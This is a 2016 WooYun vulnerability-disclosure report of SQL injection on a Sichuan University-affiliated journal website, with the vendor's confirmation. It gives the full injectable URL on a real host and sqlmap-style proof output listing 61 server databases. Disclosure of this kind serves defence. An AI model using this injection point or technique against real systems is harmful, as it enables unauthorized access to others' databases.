当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171382

漏洞标题:四川大学某站存在sql注入

相关厂商:四川大学信息管理中心

漏洞作者: 冰@封

提交时间:2016-01-20 16:43

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-20: 细节已通知厂商并且等待厂商处理中
2016-01-22: 厂商已经确认,细节仅向厂商公开
2016-02-01: 细节向核心白帽子及相关领域专家公开
2016-02-11: 细节向普通白帽子公开
2016-02-21: 细节向实习白帽子公开
2016-03-05: 细节向公众公开

简要描述:

sql注入 。。 过滤吧

详细说明:

注入点:
http://science.ijournals.cn/jsunature_cn/ch/common_item.aspx?is_three_menu=0&line_num=16&parent_id=20061209112853001&menu_id=20061209122600001

0.png


漏洞证明:

available databases [61]
[*] ahyx_journal
[*] ahyx_main
[*] ahyx_website
[*] ahyy_journal
[*] ahyy_main
[*] ahyy_website
[*] aimspress_main
[*] EditorOnline
[*] gdnykx_journal
[*] gdnykx_main
[*] gdnykx_website
[*] jamp_journal
[*] jamp_main
[*] jsjclykz_journal
[*] jsjclykz_main
[*] jsjclykz_website
[*] jsuese_main
[*] jsunature_cn_journal
[*] jsunature_en_journal
[*] jsunature_main
[*] lykxyj_journal
[*] lykxyj_main
[*] lykxyj_website
[*] master
[*] model
[*] modernradar_journal
[*] modernradar_main
[*] modernradar_website
[*] modernradaren_websit
[*] msdb
[*] scxuebao_journal
[*] scxuebao_main
[*] scxuebaoen_journal
[*] sdqx_journal
[*] sdqx_main
[*] sdqx_website
[*] tempdb
[*] tyjx_journal
[*] tyjx_journal_archive
[*] tyjx_main
[*] tyjx_main_archive
[*] wbxb_journal
[*] wbxb_main
[*] wbxb_website
[*] wdzx_journal
[*] wdzx_main
[*] wdzx_website
[*] zgjzjszz_en_website
[*] zgjzjszz_journal
[*] zgjzjszz_main
[*] zgjzjszz_website
[*] zgwstx_journal
[*] zgwstx_main
[*] zgwstx_website
[*] zhkj_journal
[*] zhkj_main
[*] zhkj_website
[*] zhkjen_website
[*] zhonggsyzz_journal
[*] zhonggsyzz_main
[*] zhonggsyzz_website

修复方案:

过滤。。。。

版权声明:转载请注明来源 冰@封@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-01-22 09:14

厂商回复:

感谢可爱的白帽子,已转告相关部门

最新状态:

暂无


漏洞评价:

评价